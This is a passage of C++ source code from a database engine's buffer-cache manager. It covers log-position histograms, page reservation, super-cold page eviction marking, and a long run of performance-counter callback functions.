Assert( pbffmp );
pbffmp->m_logHistModify.Update( lgposOld, lgpos, pbf->ifmp );
if ( fLocalLock )
{
// release only when we locked the BFFMP context
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
CLockDeadlockDetectionInfo::DisableDeadlockDetection();
pfmp->LeaveBFContextAsReader();
CLockDeadlockDetectionInfo::EnableDeadlockDetection();
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
}
}
}
void BFISetLgposModify( PBF pbf, LGPOS lgpos )
{
// the new lgposModify is later than the current lgposModify
if ( CmpLgpos( &pbf->lgposModify, &lgpos ) < 0 )
{
Assert( ( pbf->bfdf >= bfdfDirty ) && ( pbf->bfdf < bfdfMax ) );
// set the new lgposModify
BFISetLgposModifyEx( pbf, lgpos );
BFITraceSetLgposModify( pbf, lgpos );
}
}
void BFIResetLgposModify( PBF pbf )
{
BFISetLgposModifyEx( pbf, lgposMin );
}
void BFIAddUndoInfo( PBF pbf, RCE* prce, BOOL fMove )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// add this RCE to the RCE chain off of the BF
prce->AddUndoInfo( pbf->pgno, pbf->prceUndoInfoNext, fMove );
// put this RCE at the head of the list
pbf->prceUndoInfoNext = prce;
}
void BFIRemoveUndoInfo( PBF pbf, RCE* prce, LGPOS lgposModify, BOOL fMove )
{
// depend this BF on the specified lgposModify
BFISetLgposModify( pbf, lgposModify );
// if this RCE is at the head of the list, fix up the next pointer in the BF
if ( pbf->prceUndoInfoNext == prce )
{
pbf->prceUndoInfoNext = prce->PrceUndoInfoNext();
}
// remove the RCE from the RCE chain off of the BF
prce->RemoveUndoInfo( fMove );
}
// reserve up to cpgWanted pages from the avail pool
// this doesn't have to be exact so it isn't synchronized
BFReserveAvailPages::BFReserveAvailPages( const CPG cpgWanted )
{
// save these variables here to avoid concurrency errors caused
// by evaluating them multiple times
const LONG cbfAvail = (LONG)g_bfavail.Cobject();
const LONG cpgReserved = s_cpgReservedTotal;
m_cpgReserved = min( max( ( cbfAvail - cpgReserved ) / 2 , 0 ), cpgWanted );
Assert( m_cpgReserved <= cpgWanted );
Assert( m_cpgReserved >= 0 );
AtomicExchangeAdd( &s_cpgReservedTotal, m_cpgReserved );
}
// release the page reservation
BFReserveAvailPages::~BFReserveAvailPages()
{
AtomicExchangeAdd( &s_cpgReservedTotal, -m_cpgReserved );
}
// get the number of reserved pages
CPG BFReserveAvailPages::CpgReserved() const
{
Assert( m_cpgReserved >= 0 );
return m_cpgReserved;
}
LONG BFReserveAvailPages::s_cpgReservedTotal = 0;
//================================================
// move BFs from one log generation to another
//================================================
VOID BFLogHistogram::Update( const LGPOS lgposOld, const LGPOS lgposNew, IFMP ifmp )
{
Assert( lgposOld.lGeneration != lgposNew.lGeneration );
INT iGroup = m_ms.Enter();
Assert( 0 == iGroup || 1 == iGroup );
LogHistData* pData = &m_rgdata[ iGroup ];
//========================
// delete from old log generation
if ( CmpLgpos( &lgposMin, &lgposOld ) )
{
Assert( lgposOld.lGeneration < pData->m_lgenBase + pData->m_cgen );
const LONG iOld = lgposOld.lGeneration - pData->m_lgenBase;
if ( pData->m_rgc && 0 <= iOld )
{
AtomicDecrement( &pData->m_rgc[ iOld ] );
}
else
{
AtomicDecrement( &pData->m_cOverflow );
}
}
//========================
// add to new log generation
if ( CmpLgpos( &lgposMin, &lgposNew ) )
{
//========================
// overflow?
while ( pData->m_lgenBase + pData->m_cgen <= lgposNew.lGeneration )
{
m_ms.Leave( iGroup );
if ( m_crit.FTryEnter() )
{
const INT iGroupActive = m_ms.GroupActive();
LogHistData* const pDataActive = &m_rgdata[ iGroupActive ];
//========================
// still overflow inside m_crit?
if ( pDataActive->m_lgenBase + pDataActive->m_cgen <= lgposNew.lGeneration )
{
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
ReBase( ifmp, lgposNew.lGeneration );
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
}
m_crit.Leave();
}
else
{
UtilSleep( 1 );
}
iGroup = m_ms.Enter();
pData = &m_rgdata[ iGroup ];
}
LONG idxData = lgposNew.lGeneration - pData->m_lgenBase;
if ( pData->m_rgc && 0 <= idxData )
{
AtomicIncrement( &pData->m_rgc[ idxData ] );
}
else
{
AtomicIncrement( &pData->m_cOverflow );
}
}
m_ms.Leave( iGroup );
}
VOID BFLogHistogram::ReBase( IFMP ifmp, LONG lgenLatest )
{
Assert( m_crit.FOwner() );
LOG* const plog = PinstFromIfmp( ifmp )->m_plog;
const LONG igen = plog->LgposGetCheckpoint().le_lGeneration;
const LONG cgen = plog->LgposLGLogTipNoLock().lGeneration - igen + 1;
const LONG cgenActual = LNextPowerOf2( cgen + cgenNewMin );
Assert( cgenActual > 0 );
INT iGroup = m_ms.GroupActive();
Assert( 0 == iGroup || 1 == iGroup );
LogHistData* const pDataOld = &m_rgdata[ iGroup ];
LogHistData* const pDataNew = &m_rgdata[ 1 - iGroup ];
// arrange new memory
if ( pDataNew->m_rgc && cgenActual <= pDataNew->m_cgen )
{
// reuse existing memory
}
else
{
// allocate bigger memory
delete[] pDataNew->m_rgc;
if ( pDataNew->m_rgc = new LONG[ cgenActual ] )
{
pDataNew->m_cgen = cgenActual;
}
else
{
// OOM, retry at next log generation
pDataNew->m_cgen = 0;
}
}
memset( pDataNew->m_rgc, 0, sizeof( pDataNew->m_rgc[ 0 ] ) * pDataNew->m_cgen );
pDataNew->m_cOverflow = 0;
// decide histogram start point
if ( pDataOld->m_rgc && pDataNew->m_rgc )
{
// no OOM, rebase to max( checkpoint, oldbase)
pDataNew->m_lgenBase = max( igen, pDataOld->m_lgenBase );
}
else
{
// recovery from OOM ( m_rgc ), rebase to latest
// enter into OOM ( !m_rgc ), rebase to latest + 1
Assert( pDataOld->m_lgenBase + pDataOld->m_cgen <= lgenLatest );
pDataNew->m_lgenBase = lgenLatest + ( pDataNew->m_rgc ? 0 : 1 );
}
//================
// partition!!
m_ms.Partition();
// histogram migration
if ( pDataOld->m_rgc )
{
Assert( pDataOld->m_lgenBase <= pDataNew->m_lgenBase );
// retired portion
LONG cgenMax = min( pDataOld->m_cgen, pDataNew->m_lgenBase - pDataOld->m_lgenBase );
for ( LONG i = 0; i < cgenMax; ++i )
{
LONG c = pDataOld->m_rgc[ i ];
pDataOld->m_rgc[ i ] = 0;
pDataOld->m_cOverflow += c;
}
// overlapping portion (if any)
for ( LONG i = pDataNew->m_lgenBase; i < pDataOld->m_lgenBase + pDataOld->m_cgen; ++i )
{
LONG c = pDataOld->m_rgc[ i - pDataOld->m_lgenBase ];
pDataOld->m_rgc[ i - pDataOld->m_lgenBase ] = 0;
if ( pDataNew->m_rgc )
{
AtomicExchangeAdd( &pDataNew->m_rgc[ i - pDataNew->m_lgenBase ], c );
}
else
{
AtomicExchangeAdd( &pDataNew->m_cOverflow, c );
}
}
// verify that we don't miss any dirty BFs!!
for ( LONG i = 0; i < pDataOld->m_cgen; ++i )
{
Assert( 0 == pDataOld->m_rgc[ i ] );
}
}
// carry over the overflow (if any)
AtomicExchangeAdd( &pDataNew->m_cOverflow, pDataOld->m_cOverflow );
}
// return total number of BFs for modified and pinned
BFSTAT BFLogHistogram::Read( void )
{
static BFSTAT bfstatCache( 0, 0 );
volatile static TICK tickCacheLoad = 0;
const TICK tickCacheLife = 200; // cache is good for 200ms
// good enough, don't bother with locks.
TICK tickNow = TickOSTimeCurrent();
if ( tickNow - tickCacheLoad < tickCacheLife )
{
return bfstatCache;
}
tickCacheLoad = tickNow;
LONG cBFMod = 0;
LONG cBFPin = 0;
// lock! so, critical information of g_rgfmp array won't change
FMP::EnterFMPPoolAsReader();
if ( g_rgfmp )
{
for ( IFMP ifmp = FMP::IfmpMinInUse(); ifmp <= FMP::IfmpMacInUse(); ifmp++ )
{
FMP* const pfmp = &g_rgfmp[ ifmp ];
if ( pfmp )
{
pfmp->EnterBFContextAsReader();
BFFMPContext* const pbffmp = ( BFFMPContext* )pfmp->DwBFContext();
if ( pfmp->FInUse() && !pfmp->FIsTempDB() && pbffmp )
{
BFLogHistogram* const pHist = &pbffmp->m_logHistModify;
INT iGroup = pHist->m_ms.Enter();
LogHistData* pData = &pHist->m_rgdata[ iGroup ];
LONG lgenWaypoint = pfmp->LgposWaypoint().lGeneration;
cBFMod += pData->m_cOverflow;
cBFPin += ( !pData->m_rgc || lgenWaypoint < pData->m_lgenBase ) ? pData->m_cOverflow : 0;
if ( pData->m_rgc )
{
for ( LONG i = 0; i < pData->m_cgen; ++i )
{
LONG c = pData->m_rgc[ i ];
cBFMod += c;
cBFPin += ( pData->m_lgenBase + i < lgenWaypoint ) ? 0 : c;
}
}
pHist->m_ms.Leave( iGroup );
}
pfmp->LeaveBFContextAsReader();
}
}
}
FMP::LeaveFMPPoolAsReader();
// good enough, don't bother with locks or interlockedexchange8B
BFSTAT bfstatRet( cBFMod, cBFPin );
bfstatCache = bfstatRet;
return bfstatRet;
}
INLINE void BFIMarkAsSuperCold( PBF pbf, const BOOL fUser )
{ // the caller needs X access to this bf so that we can set fNewlyEvicted safely.
Assert( pbf->sxwl.FOwnExclusiveLatch() ||
pbf->sxwl.FOwnWriteLatch() ||
// this last case is we have the virtual write latch from lockless write IO
( pbf->err == wrnBFPageFlushPending && NULL == pbf->pWriteSignalComplete ) );
g_bflruk.MarkAsSuperCold( pbf );
// to keep parity with other BF/resmgr traces, we'll only trace super-cold calls
// for current versions
if ( !pbf->fOlderVersion )
{
Assert( pbf->fCurrentVersion );
BFITraceMarkPageAsSuperCold( pbf->ifmp, pbf->pgno );
}
// mark this BF as "newly evicted" so that when it is actually evicted
// we will mark it as not "newly evicted". this will make it so that
// super-cold pages do not cause cache growth when they are reused
pbf->fNewlyEvicted = fTrue;
// update perf counters to indicate activity
if ( fUser )
{
PERFOpt( cBFSuperColdsUser.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else
{
PERFOpt( cBFSuperColdsInternal.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
}
C_ASSERT( sizeof(CPAGE::PGHDR) == 40 );
INLINE void BFITouchResource(
__in const PBF pbf,
__in const BFLatchType bfltTraceOnly,
__in const BFLatchFlags bflfTraceOnly,
__in const BOOL fTouchPage,
__in const ULONG_PTR pctCachePriority,
__in const TraceContext& tc )
{
const TICK tickTouch = TickOSTimeCurrent();
const BOOL fNewPage = ( bflfTraceOnly & ( bflfNew | bflfNewIfUncached ) );
const BOOL fDBScan = ( bflfTraceOnly & bflfDBScan );
const BFRequestTraceFlags bfrtf = BFRequestTraceFlags(
( fTouchPage ? bfrtfNone : bfrtfNoTouch ) |
( fNewPage ? bfrtfNewPage : bfrtfUseHistory ) |
( BoolParam( JET_paramEnableFileCache ) ? bfrtfFileCacheEnabled : bfrtfNone ) |
( fDBScan ? bfrtfDBScan : bfrtfNone ) );
if ( fTouchPage )
{
// Technically, this is an Expected(), though it is a real problem for the resmgr replayer, so
// we'll leave it as an assert. Besides, it's indeed silly to be touching an older buffer
// anyways.
AssertSz( pbf->fCurrentVersion && !pbf->fOlderVersion, "We should not be touching an older version of a page." );
const TICK tickLastBefore = pbf->lrukic.TickLastTouchTime();
const BFLRUK::ResMgrTouchFlags rmtf = g_bflruk.RmtfTouchResource( pbf, pctCachePriority, tickTouch );
// This will count as a unique request/touch iff the last touch timestamp of the page
// is older than the last reset timestamp for calculating unique requests.
// Also, filter out kNoTouch to avoid multiple threads double-counting this.
if ( ( rmtf != BFLRUK::kNoTouch ) && !fDBScan )
{
const BOOL fUpdatePerfCounter = ( TickCmp( tickLastBefore, g_tickBFUniqueReqLast ) <= 0 );
const BOOL fUpdateThreadStats = ( TickCmp( tickLastBefore, Ptls()->TickThreadStatsLast() ) <= 0 );
if ( fUpdatePerfCounter || fUpdateThreadStats )
{
OnDebug( const TICK tickLastAfter = pbf->lrukic.TickLastTouchTime() );
Assert( TickCmp( tickLastAfter, tickLastBefore ) >= 0 );
if ( fUpdatePerfCounter )
{
PERFOpt( cBFCacheUniqueReq.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce, pbf->ifmp ) );
PERFOpt( cBFCacheUniqueHit.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce, pbf->ifmp ) );
}
if ( fUpdateThreadStats )
{
Ptls()->threadstats.cPageUniqueCacheRequests++;
Ptls()->threadstats.cPageUniqueCacheHits++;
}
}
}
}
BFITraceRequestPage( tickTouch, pbf, (ULONG)pctCachePriority, bfltTraceOnly, bflfTraceOnly, bfrtf, tc );
}
#ifdef PERFMON_SUPPORT
//
// Performance Monitoring Support
//
PERFInstanceLiveTotalWithClass<ULONG> cBFCacheMiss;
LONG LBFCacheMissesCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheMiss.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFCacheHitsCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = cBFCacheReq.Get( iInstance ) - cBFCacheMiss.Get( iInstance );
}
return 0;
}
PERFInstanceLiveTotalWithClass<ULONG> cBFCacheReq;
LONG LBFCacheReqsCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheReq.PassTo( iInstance, pvBuf );
return 0;
}
TICK g_tickBFUniqueReqLast = 0;
PERFInstanceLiveTotalWithClass<ULONG, INST, 2> cBFCacheUniqueHit;
PERFInstanceLiveTotalWithClass<ULONG, INST, 2> cBFCacheUniqueReq;
LONG LBFCacheUniqueHitsCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheUniqueHit.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFCacheUniqueReqsCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheUniqueReq.PassTo( iInstance, pvBuf );
// Only reset this every second at the most.
const TICK tickNow = TickOSTimeCurrent();
if ( DtickDelta( g_tickBFUniqueReqLast, tickNow ) >= 1000 )
{
g_tickBFUniqueReqLast = tickNow;
}
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFSuperColdsUser;
LONG LBFSuperColdsUserCEFLPv( LONG iInstance, void* pvBuf )
{
cBFSuperColdsUser.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFSuperColdsInternal;
LONG LBFSuperColdsInternalCEFLPv( LONG iInstance, void* pvBuf )
{
cBFSuperColdsInternal.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFCleanBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfCacheClean;
}
return 0;
}
LONG LBFPinnedBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
//BFSTAT bfStat = BFLogHistogram::Read();
//*( ( LONG* ) pvBuf ) = bfStat.m_cBFPin;
*( ( LONG* ) pvBuf ) = 0;
}
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesReadAsync;
LONG LBFPagesReadAsyncCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesReadAsync.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesReadSync;
LONG LBFPagesReadSyncCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesReadSync.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFDirtied;
LONG LBFPagesDirtiedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFDirtied.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFDirtiedRepeatedly;
LONG LBFPagesDirtiedRepeatedlyCEFLPv( LONG iInstance, void* pvBuf )
{
cBFDirtiedRepeatedly.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesWritten;
LONG LBFPagesWrittenCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesWritten.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFPagesTransferredCEFLPv( LONG iInstance, void* pvBuf )
{
if ( NULL != pvBuf )
{
*( (LONG *) pvBuf ) = cBFPagesReadAsync.Get( iInstance )
+ cBFPagesReadSync.Get( iInstance )
+ cBFPagesWritten.Get( iInstance );
}
return 0;
}
// OS MM trimming / reclaim counters
//
// - Database Pages Non-Resident Trimmed by OS/sec
// - Database Pages Non-Resident Reclaimed (Hard Faulted)/sec
// - Database Pages Non-Resident Reclaimed (Soft Faulted)/sec
// - Database Pages Non-Resident Reclaimed (Failed)/sec
// - Database Pages Non-Resident Re-read/sec
// - Database Pages Non-Resident Evicted (Normally)/sec
// - Database Pages Non-Resident Hard Faulted In Latency (us)/sec
//
// Some notes:
// - "Reclaimed (Soft Faulted)" and "Evicted (Normally)" are the ideal cases
// as we re-used the memory before it got paged to disk, or decided to evict
// the page normally respectively.
// - "Reclaimed (Failed)" is not equal to "Re-read" ... we can fail a reclaim
// and then not increment Re-read if it is a new page request.
LONG g_cbfTrimmed;
LONG LBFPagesNonResidentTrimmedByOsCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
// I don't understand how this works, as a LONG will wrap ... but there are other
// instances of this in our perf counters.
// Update: Pretty sure this works because these (or at least this one) perf counters
// are using a delta operation to compute the rate per second. However, if the perf
// counter was being used via it's RAW count for a test or tool, then we would need
// to move this to 64-bit number.
*( (ULONG*) pvBuf ) = g_cbfTrimmed;
}
return 0;
}
LONG g_cbfNonResidentReclaimedSuccess;
LONG LBFPagesNonResidentReclaimedSuccessCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfNonResidentReclaimedSuccess;
}
return 0;
}
LONG g_cbfNonResidentReclaimedFailed;
LONG LBFPagesNonResidentReclaimedFailedCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfNonResidentReclaimedFailed;
}
return 0;
}
LONG g_cbfNonResidentRedirectedToDatabase;
LONG LBFPagesNonResidentRedirectedToDatabaseCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfNonResidentRedirectedToDatabase;
}
return 0;
}
LONG g_cbfNonResidentEvicted;
LONG LBFPagesNonResidentEvictedCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfNonResidentEvicted;
}
return 0;
}
LONG g_cbfNonResidentReclaimedHardSuccess;
LONG LPagesNonResidentReclaimedHardSuccessCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cbfNonResidentReclaimedHardSuccess;
}
return 0;
}
// A 63-bit integer gives us 14.6 years @ 20 second latencies @ 1000 faults\IOs per
// second (or really sample period).
unsigned __int64 g_cusecNonResidentFaultedInLatencyTotal;
LONG LBFPagesNonResidentFaultedInLatencyUsCEFLPv( LONG iInstance, VOID * pvBuf )
{
if ( pvBuf )
{
*( (unsigned __int64*) pvBuf ) = g_cusecNonResidentFaultedInLatencyTotal;
}
return 0;
}
// Latch counters
//
LONG LBFLatchCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheReq.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstance<> cBFSlowLatch;
LONG LBFFastLatchCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = cBFCacheReq.Get( iInstance ) - cBFSlowLatch.Get( iInstance );
}
return 0;
}
PERFInstance<> cBFBadLatchHint;
LONG LBFBadLatchHintCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
cBFBadLatchHint.PassTo( iInstance, pvBuf );
}
return 0;
}
PERFInstance<> cBFLatchConflict;
LONG LBFLatchConflictCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
cBFLatchConflict.PassTo( iInstance, pvBuf );
}
return 0;
}
PERFInstance<> cBFLatchStall;
LONG LBFLatchStallCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
cBFLatchStall.PassTo( iInstance, pvBuf );
}
return 0;
}
LONG LBFAvailBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bfavail.Cobject() : 0;
return 0;
}
LONG LBFCacheFaultCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bfavail.CRemove() : 0;
return 0;
}
LONG LBFCacheEvictCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_cbfNewlyEvictedUsed;
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheEvictUntouched;
LONG LBFCacheEvictUntouchedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheEvictUntouched.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheEvictk1;
LONG LBFCacheEvictk1CEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheEvictk1.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheEvictk2;
LONG LBFCacheEvictk2CEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheEvictk2.PassTo( iInstance, pvBuf );
return 0;
}
// because first reason starts at 1, and we don't subtract bfefReasonMin, we're wasting one slot. Not a big deal though.
PERFInstanceLiveTotalWithClass<> rgcBFCacheEvictReasons[bfefReasonMax];
LONG LBFCacheEvictScavengeAvailPoolCEFLPv( LONG iInstance, void* pvBuf )
{
C_ASSERT( bfefReasonAvailPool < _countof(rgcBFCacheEvictReasons) );
rgcBFCacheEvictReasons[bfefReasonAvailPool].PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheEvictScavengeSuperColdInternal;
LONG LBFCacheEvictScavengeSuperColdInternalCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheEvictScavengeSuperColdInternal.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheEvictScavengeSuperColdUser;
LONG LBFCacheEvictScavengeSuperColdUserCEFLPv( LONG iInstance, void* pvBuf )
{
cBFCacheEvictScavengeSuperColdUser.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFCacheEvictScavengeShrinkCEFLPv( LONG iInstance, void* pvBuf )
{
C_ASSERT( bfefReasonShrink < _countof(rgcBFCacheEvictReasons) );
rgcBFCacheEvictReasons[bfefReasonShrink].PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFCacheEvictOtherCEFLPv( LONG iInstance, void* pvBuf )
{
C_ASSERT( bfefReasonPurgeContext < _countof(rgcBFCacheEvictReasons) );
C_ASSERT( bfefReasonPurgePage < _countof(rgcBFCacheEvictReasons) );
C_ASSERT( bfefReasonPatch < _countof(rgcBFCacheEvictReasons) );
if ( pvBuf != NULL )
{
LONG lBufPurgeContext, lBufPurgePage, lBufPatch;
rgcBFCacheEvictReasons[bfefReasonPurgeContext].PassTo( iInstance, &lBufPurgeContext );
rgcBFCacheEvictReasons[bfefReasonPurgePage].PassTo( iInstance, &lBufPurgePage );
rgcBFCacheEvictReasons[bfefReasonPatch].PassTo( iInstance, &lBufPatch );
*( (LONG*)pvBuf ) = lBufPurgeContext + lBufPurgePage + lBufPatch;
}
return 0;
}
LONG LBFAvailStallsCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bfavail.CRemoveWait() : 0;
return 0;
}
LONG LBFTotalBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = (ULONG)( g_fBFInitialized ? cbfCacheSize : 1 );
return 0;
}
LONG LBFTotalBuffersUsedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = (ULONG)( g_fBFInitialized ? CbfBFICacheUsed() : 1 );
return 0;
}
LONG LBFTotalBuffersCommittedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = (ULONG)( g_fBFInitialized ? CbfBFICacheCommitted() : 1 );
return 0;
}
LONG LBFCacheSizeCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = CbBFICacheSizeUsedDehydrated();
return 0;
}
LONG LBFCacheSizeMBCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( CbBFICacheSizeUsedDehydrated() / ( 1024 * 1024 ) );
return 0;
}
LONG LBFCacheSizeEffectiveCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = CbBFICacheISizeUsedHydrated();
return 0;
}
LONG LBFCacheSizeEffectiveMBCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( CbBFICacheISizeUsedHydrated() / ( 1024 * 1024 ) );
return 0;
}
LONG LBFCacheMemoryReservedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = CbBFICacheIMemoryReserved();
return 0;
}
LONG LBFCacheMemoryReservedMBCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( CbBFICacheIMemoryReserved() / ( 1024 * 1024 ) );
return 0;
}
LONG LBFCacheMemoryCommittedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = CbBFICacheIMemoryCommitted();
return 0;
}
LONG LBFCacheMemoryCommittedMBCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( CbBFICacheIMemoryCommitted() / ( 1024 * 1024 ) );
return 0;
}
LONG LBFDehydratedBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
LONG cbf = 0;
// for now any buffer that is not the max buffer size is a dehydrated buffer/
// when we support multiple page sizes this will have to change.
for( INT icb = icbPageSmallest; icb < g_icbCacheMax; icb++ )
{
cbf += g_rgcbfCachePages[icb];
}
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = cbf;
}
return 0;
}
LONG LBFCacheSizeTargetCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (unsigned __int64*) pvBuf ) = g_cacheram.GetOptimalResourcePoolSize();
}
return 0;
}
LONG LBFCacheSizeTargetMBCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (unsigned __int64*) pvBuf ) = g_cacheram.GetOptimalResourcePoolSize() / ( 1024 * 1024 );
}
return 0;
}
PERFInstanceDelayedTotalWithClass< LONG, INST, 2 > cBFCache;
LONG LBFCacheSizeMBCategorizedCEFLPv( LONG iInstance, void* pvBuf )
{
// Note: This fakes the cache resident, and so may be inaccurate.
const __int64 cbAveBufferSize = CbBFIAveResourceSize();
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( ( (ULONG_PTR)cBFCache.Get( iInstance ) * cbAveBufferSize ) / ( 1024 * 1024 ) );
return 0;
}
LONG LBFCacheSizeCategorizedCEFLPv( LONG iInstance, void* pvBuf )
{
// Note: This fakes the cache resident, and so may be inaccurate.
const __int64 cbAveBufferSize = CbBFIAveResourceSize();
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( (ULONG_PTR)cBFCache.Get( iInstance ) * cbAveBufferSize ) ;
return 0;
}
LONG LBFCacheSizeMinCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = (ULONG_PTR)UlParam( JET_paramCacheSizeMin ) * g_rgcbPageSize[g_icbCacheMax];
return 0;
}
LONG LBFCacheSizeMaxCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = (ULONG_PTR)UlParam( JET_paramCacheSizeMax ) * g_rgcbPageSize[g_icbCacheMax];
return 0;
}
LONG LBFCacheSizeResidentCEFLPv( LONG iInstance, void* pvBuf )
{
// Note: This fakes the cache resident, and so may be inaccurate.
const __int64 cbAveBufferSize = CbBFIAveResourceSize();
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = (ULONG_PTR)g_cbfCacheResident * cbAveBufferSize;
return 0;
}
LONG LBFCacheSizeResidentMBCEFLPv( LONG iInstance, void* pvBuf )
{
// Note: This fakes the cache resident, and so may be inaccurate.
const __int64 cbAveBufferSize = CbBFIAveResourceSize();
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( ( (ULONG_PTR)g_cbfCacheResident * cbAveBufferSize ) / ( 1024 * 1024 ) );
return 0;
}
LONG LBFCacheSizingDurationCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (unsigned __int64*) pvBuf ) = DtickBFIMaintCacheSizeDuration() / 1000;
}
return 0;
}
__int64 g_cbCacheUnattached = 0;
LONG LBFCacheUnattachedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = g_cbCacheUnattached;
return 0;
}
LONG LBFStartFlushThresholdCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = (ULONG)cbfAvailPoolLow;
}
return 0;
}
LONG LBFStopFlushThresholdCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = (ULONG)cbfAvailPoolHigh;
}
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesPreread;
